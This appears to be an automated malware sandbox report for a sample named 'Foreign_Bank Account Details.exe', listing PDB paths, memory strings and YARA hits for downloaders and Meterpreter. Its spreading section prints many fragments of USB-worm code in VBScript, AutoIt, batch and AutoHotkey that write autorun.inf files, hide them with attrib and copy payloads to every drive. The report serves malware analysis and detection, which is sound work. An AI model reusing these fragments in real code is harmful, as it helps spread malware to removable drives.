Source: Binary string: D:\DevPatch\_FINAL\Bin\MapleStory.pdb source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp
Source: Binary string: \x86\Release\swhost.pdb source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp
Source: Binary string: SuzanDLL\Release\suzanw.pdb source: MpSigStub.exe, 00000023.00000003.18303445859.0000015B1B86F000.00000004.00000001.sdmp
Source: Binary string: 0\wrapper3.pdb source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp
Source: Binary string: !kpdfcore\obj\Release\kpdfcore.pdb source: MpSigStub.exe, 00000023.00000003.18319632958.0000015B1BDD9000.00000004.00000001.sdmp
Source: Binary string: T:\TFS-TradeProject\PDB\Release\TT-Miner.pdb source: MpSigStub.exe, 00000023.00000003.18286213062.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: \ggg\build\Release_32\libglib-2.0-0.pdb source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp
Source: Binary string: cmd.pdb source: MpSigStub.exe, 00000023.00000003.18339366931.0000015B1C174000.00000004.00000001.sdmp
Source: Binary string: d+D:\tortoiseSVN\nsc5\bin\Release\nssock2.pdbd source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp
Source: Binary string: er.pdb source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp
Source: Binary string: x:\Dev_CPP\Work\VS_KnzStr_Adware\Release\VS_Work1.pdb source: MpSigStub.exe, 00000023.00000003.18318994950.0000015B1A589000.00000004.00000001.sdmp
Source: Binary string: Sniffer\Release\Sniffer.pdbxS source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp
Source: Binary string: diskpart.pdb source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp
Source: Binary string: F:\Projects\WebInject\bin\x64\Release_logged\webinject64.pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: "E:\DLMon5\drv\obj\i386\RioDrvs.pdba source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp
Source: Binary string: wship6.pdb3 source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp
Source: Binary string: 9desktop_apps_ng\workspace\build\loader\Release\loader.pdb source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\logoff\objfre\i386\logoff.pdb source: MpSigStub.exe, 00000023.00000003.18402123411.0000015B1B2B1000.00000004.00000001.sdmp
Source: Binary string: module_ls.pdb source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp
Source: Binary string: \\Projects\\dll.\\.+\\dll.\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: 8rise\Window\position\Character\opposite\Miss\lawCome.pdb~ source: MpSigStub.exe, 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp
Source: Binary string: Seed\trunk\output\bin\ntsvc.pdbxO source: MpSigStub.exe, 00000023.00000003.18292431996.0000015B1BA3D000.00000004.00000001.sdmp
Source: Binary string: 2branches\xiaoyuTrunk\bin\Release\Win32\Upgrade.pdb source: MpSigStub.exe, 00000023.00000003.18339677269.0000015B1AB04000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-security-base-l1-1-0.pdb source: MpSigStub.exe, 00000023.00000003.18341814408.0000015B1C2D4000.00000004.00000001.sdmp
Source: Binary string: \\Project's\\xCrypt3r\\stub_crypter\\Release\\stub.pdb source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp
Source: Binary string: X:\\DEgELgPMENT\\VC\+\+\\CrgptorgEvolugionggld\\relgase\\m.pdb source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp
Source: Binary string: 9C:\Users\Seman\source\repos\Triforce\Release\Triforce.pdb source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp
Source: Binary string: FDM3\bin\Release\FdmBrowserHelper.pdb source: MpSigStub.exe, 00000023.00000003.18329049691.0000015B1ABCB000.00000004.00000001.sdmp
Source: Binary string: wmidx.pdbj source: MpSigStub.exe, 00000023.00000003.18290902842.0000015B1BFA6000.00000004.00000001.sdmp
Source: Binary string: ramaint.pdb source: MpSigStub.exe, 00000023.00000003.18319967809.0000015B1BE5C000.00000004.00000001.sdmp
Source: Binary string: mstext40.pdb3 source: MpSigStub.exe, 00000023.00000003.18305343223.0000015B1C4E5000.00000004.00000001.sdmp
Source: Binary string: \Release\initialexe\torch.exe.pdbxE source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp
Source: Binary string: d:\Projects\AKL\kh\Release\kh.pdb source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp

Spreading:

barindex
Yara detected Autohotkey Downloader Generic
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
May infect USB drives
Source: MpSigStub.exe, 00000023.00000003.18287888120.0000015B1BC0A000.00000004.00000001.sdmp Binary or memory string: [autorun];
Source: MpSigStub.exe, 00000023.00000003.18287888120.0000015B1BC0A000.00000004.00000001.sdmp Binary or memory string: x7[autorun];
Source: MpSigStub.exe, 00000023.00000003.18301236868.0000015B1B97A000.00000004.00000001.sdmp Binary or memory string: %windir%\system32\win.dll\reg.bkp\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.18301236868.0000015B1B97A000.00000004.00000001.sdmp Binary or memory string: autorun.inf
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: setaq=fso.getfile(status)iffso.fileexists(tmpt)thenfso.getfile(tmpt).attributes=0aq.copytmpt,truesetaq=fso.getfile(tmpt)aq.attributes=39anv=tmp+"\auto.exe"ifnotfso.fileexists(anv)thenaq.copyanvsetauto=fso.getfile(anv)auto.attributes=0setaut=fso.opentextfile(tmp+an,2,true,0)isi="[autorun]>open=wscript.exe//e:vbscriptthumb.dbauto>shell\open=open>shell\open\command=wscript.exe//e:vbscriptthumb.dbauto>shell\open\default=1>shell\explore=explore>shell\explore\command=wscript.exe//e:vbscriptthumb.dbauto
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: [autorun]
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: [autorun]
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: :\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: AutoRun.inf
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: AutoRun.inf]
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: %s\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: :\AutoRun.inf
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: [AutoRun]
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: %c:\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: [AutoRun]
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\Runkrag%c:\autorun.inf[AutoRun]
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\Microsoft\Windows\CurrentVersion\Runkrag%c:\autorun.inf[AutoRun]
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: [Autorun]]
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: [autorun]d$open = autorun.exed4shellexecute = autorun.exed
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: \autorun.inf
Source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp Binary or memory string: torun.infshell\open\command=virus.exe[AutoRun]\virus.exe
Source: MpSigStub.exe, 00000023.00000003.18334520035.0000015B1A6C6000.00000004.00000001.sdmp Binary or memory string: docopy/yautorun.inf%%x:autorun.inf
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp Binary or memory string: %sautorun.inf
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp Binary or memory string: :\Autorun.inf
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp Binary or memory string: v[autorun];
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp Binary or memory string: deviceid&"\cysset.exe","-a+hsr")$file=fileopen($objevent.targetinstance.deviceid&"\autorun.inf"
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp Binary or memory string: adeviceid&"\cysset.exe","-a+hsr")$file=fileopen($objevent.targetinstance.deviceid&"\autorun.inf"
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp Binary or memory string: C:\TEMP\\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp Binary or memory string: C:\TEMP\\autorun.inf]
Source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp Binary or memory string: >> autorun.inf
Source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp Binary or memory string: .exe -h -s -r autorun.inf
Source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp Binary or memory string: shell\open=Open >> autorun.inf
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp Binary or memory string: [Autorun]
Source: MpSigStub.exe, 00000023.00000003.18425885690.0000015B1BCD0000.00000004.00000001.sdmp Binary or memory string: \Autorun.inf
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp Binary or memory string: line1 = "[autorun]" && line2 = "open = System\DriveGuard\DriveProtect.exe -run
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp Binary or memory string: filesetattrib, -RASH, %thsdrv%\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.18423368163.0000015B1C1B6000.00000004.00000001.sdmp Binary or memory string: *filesetattrib, -RASH, %thsdrv%\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp Binary or memory string: S[autorun]
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp Binary or memory string: E[autorun]
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp Binary or memory string: G[autorun]
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp Binary or memory string: [autorun]shell\explore\command=
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp Binary or memory string: D:\Autorun.inf
Source: MpSigStub.exe, 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp Binary or memory string: [autorun]open=avm10\avm10stakakodimolim.exe
Source: MpSigStub.exe, 00000023.00000003.18346670516.0000015B1AC31000.00000004.00000001.sdmp Binary or memory string: -[autorun]open=avm10\avm10stakakodimolim.exe
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp Binary or memory string: shell\install\command=foto.exe>>%co%autorun.inf
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp Binary or memory string: 1shell\install\command=foto.exe>>%co%autorun.inf
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp Binary or memory string: in(cdefghijklmnopqrstuvwxyz)doxcopy/h/y/r/kautorun.inf%%
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp Binary or memory string: [autorun]open=shell\open=(&o)shell\open\command=s-
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp Binary or memory string: f[autorun]open=shell\open=(&o)shell\open\command=s-
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp Binary or memory string: %windir%\system32\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.18307753022.0000015B1B767000.00000004.00000001.sdmp Binary or memory string: %c:\AUTORUN.INF
Source: MpSigStub.exe, 00000023.00000003.18281872533.0000015B1C527000.00000004.00000001.sdmp Binary or memory string: autorun.inf4++
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp Binary or memory string: M:\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp Binary or memory string: [autorun]]
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp Binary or memory string: atr="[autorun]"&vbcrlf&"shellexecute=wscript.exe/e:vbs
Source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp Binary or memory string: ?atr="[autorun]"&vbcrlf&"shellexecute=wscript.exe/e:vbs
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp Binary or memory string: [Autorun]
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp Binary or memory string: %sAutoRun.inf
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp Binary or memory string: %s\AutoRun.inf
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp Binary or memory string: [autorun]Open = action=Abrir carpeta para ver archivos
Source: MpSigStub.exe, 00000023.00000003.18429220503.0000015B1A3C2000.00000004.00000001.sdmp Binary or memory string: I[autorun]
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp Binary or memory string: AutoRun.infd
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp Binary or memory string: AutoRun.infd2Program Files\Common Files\Microsoft Shared\MSINFO
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: %c:\Autorun.inf
Source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp Binary or memory string: (/c echo [autorun] >>
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp Binary or memory string: .*if"%1"=="+"attrib+s+a+h+r%2\autorun.inf:end
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp Binary or memory string: \autorun.inf\
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp Binary or memory string: [autorun]shellexecute=recycler\s-6-
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp Binary or memory string: `[autorun]shellexecute=recycler\s-6-
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp Binary or memory string: '[autorun]
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp Binary or memory string: 3:\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp Binary or memory string: [autorun]]
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp Binary or memory string: Y[autorun]
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp Binary or memory string: [autorun]shellexecute="resycled\boot.com
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp Binary or memory string: /[autorun]shellexecute="resycled\boot.com
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp Binary or memory string: X:\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp Binary or memory string: .vbs&startautorun.inf&exit
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp Binary or memory string: /cstartservieca.vbs&startautorun.inf&exit
Source: MpSigStub.exe, 00000023.00000003.18316647369.0000015B1B557000.00000004.00000001.sdmp Binary or memory string: +/cstartservieca.vbs&startautorun.inf&exit
Source: MpSigStub.exe, 00000023.00000003.18326506118.0000015B1A705000.00000004.00000001.sdmp Binary or memory string: ;&lt;br/&gt;[autorun]&lt;br/&gt;open=terserah.exe&lt;br/&gt;shellexecute=terserah.exe&lt;br/&gt;action=openfoldert
Source: MpSigStub.exe, 00000023.00000003.18326506118.0000015B1A705000.00000004.00000001.sdmp Binary or memory string: t;&lt;br/&gt;[autorun]&lt;br/&gt;open=terserah.exe&lt;br/&gt;shellexecute=terserah.exe&lt;br/&gt;action=openfoldert
Source: MpSigStub.exe, 00000023.00000003.18293334552.0000015B1BC8E000.00000004.00000001.sdmp Binary or memory string: AUTORUN.INF
Source: MpSigStub.exe, 00000023.00000003.18317322207.0000015B1B5DB000.00000004.00000001.sdmp Binary or memory string: autorun.infx
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp Binary or memory string: %A_LoopField%:\AutoRun.inf
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp Binary or memory string: [AUTORUN]
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp Binary or memory string: AUTORUN.INF[AUTORUN]
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp Binary or memory string: AUTORUN.INF[AUTORUN]
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp Binary or memory string: 'kill_del(, a_loopfield ":\autorun.inf")
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp Binary or memory string: %TsDv%\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp Binary or memory string: [autorun]ACTION=Open USB Driveopen=
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp Binary or memory string: filesetattrib, +RASH, %TsDv%\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp Binary or memory string: [autorun]shellexecute=speedkill3.vbsaction=icon=1.icolabel=flesh
Source: MpSigStub.exe, 00000023.00000003.18426294063.0000015B1BD11000.00000004.00000001.sdmp Binary or memory string: B[autorun]shellexecute=speedkill3.vbsaction=icon=1.icolabel=flesh
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp Binary or memory string: echo [AutoRun] > %%
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp Binary or memory string: filesetattrib($var[$i]&"\autorun.inf","-hsr
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp Binary or memory string: |filesetattrib($var[$i]&"\autorun.inf","-hsr
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp Binary or memory string: =fileopen($var[$i]&"\autorun.inf",10)filewrite($
Source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp Binary or memory string: ,"[autorun]"&@crlf)
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp Binary or memory string: copy%hty1%autorun.inf%%i:&attrib+r+s+h%%i:\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp Binary or memory string: 8copy%hty1%autorun.inf%%i:&attrib+r+s+h%%i:\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp Binary or memory string: Autorun.inf]
Source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp Binary or memory string: autorun.infS
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp Binary or memory string: c:\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp Binary or memory string: [autorun]@#Open=tool.exe@#Shellexecute=tool.exe@#Shell
Source: MpSigStub.exe, 00000023.00000003.18423819335.0000015B1B1FA000.00000004.00000001.sdmp Binary or memory string: 6[autorun]@#Open=tool.exe@#Shellexecute=tool.exe@#Shell
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp Binary or memory string: autorun.inf]
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp Binary or memory string: iniwrite($fix[$a]&"\autorun.inf","autorun","shellexecute","temp.pif")
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp Binary or memory string: Giniwrite($fix[$a]&"\autorun.inf","autorun","shellexecute","temp.pif")
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp Binary or memory string: \\autorun.inf
Source: MpSigStub.exe, 00000023.00000003.18433793263.0000015B1AEE2000.00000004.00000001.sdmp Binary or memory string: [autorun]open=
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp Binary or memory string: [autorun]action=openshellexecute=
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp Binary or memory string: \sysautorun.inf
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp Binary or memory string: \sysautorun.inf]
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp Binary or memory string: 0AutoRun.inf
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp Binary or memory string: 0[AutoRun]
Source: MpSigStub.exe, 00000023.00000003.18432805737.0000015B1BA3B000.00000004.00000001.sdmp Binary or memory string: %s:\AutoRun.inf
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp Binary or memory string: :\autorun.infopenAutoRun]
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp Binary or memory string: [autorun]shell\open\command=d:\systemvolumeinformation.exeshell\explore\command=d:\systemvolumeinformation.exe
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp Binary or memory string: p[autorun]shell\open\command=d:\systemvolumeinformation.exeshell\explore\command=d:\systemvolumeinformation.exe
Source: MpSigStub.exe, 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp Binary or memory string: [autorun]open=service.exeshell\open=(&o)shell\open\command=service.exeshell\open\default=1shell\explore=(&x)shell\explore\command=service.exe
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\ Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\1.349.0.0_to_1.351.0.0_mpavbase.vdm._p Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\ Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\ Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File opened: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0\mpavdlta.vdm Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File opened: C:\Windows\SERVIC~1\ Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D4ADEC FindFirstFileW,FindNextFileW,FindClose,FindClose, 42_2_00007FF650D4ADEC
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D4B030 FindNextFileW,FindClose,FindFirstFileW, 42_2_00007FF650D4B030
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D72504 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 42_2_00007FF650D72504
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650CFF810 FindFirstFileW,FindNextFileW,FindClose,CloseHandle,CloseHandle, 42_2_00007FF650CFF810

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 5x nop then mov edx, edx 1_2_004012D8
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 6x nop then mov edx, edx 1_2_004012D8
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 4x nop then mov ecx, ecx 1_2_004012D8
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 5x nop then mov edx, edx 1_2_00402061
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 6x nop then mov edx, edx 1_2_00402061
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 4x nop then mov ecx, ecx 1_2_00402061
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 4x nop then mov ecx, ecx 1_2_00402267
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 5x nop then mov edx, edx 1_2_004020E7
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 6x nop then mov edx, edx 1_2_004020E7
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 4x nop then mov ecx, ecx 1_2_004020E7
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 4x nop then mov ecx, ecx 1_2_004022E9
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 4x nop then mov ecx, ecx 1_2_00402379
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 5x nop then mov edx, edx 1_2_0040191F
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 6x nop then mov edx, edx 1_2_0040191F
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 4x nop then mov ecx, ecx 1_2_0040191F
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 6x nop then mov edx, edx 1_2_004021F3
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Code function: 4x nop then mov ecx, ecx 1_2_004021F3

Networking:

barindex
Yara detected PasteDownloader
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b4cce16.210.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b4cce16.61.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1b4cce16.92.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.25.unpack, type: UNPACKEDPE
Source: Yara match File source: 35.3.MpSigStub.exe.15b1bc1013a.56.unpack, type: UNPACKEDPE
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
Yara detected Meterpreter
Source: Yara match File source: 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp, type: MEMORY
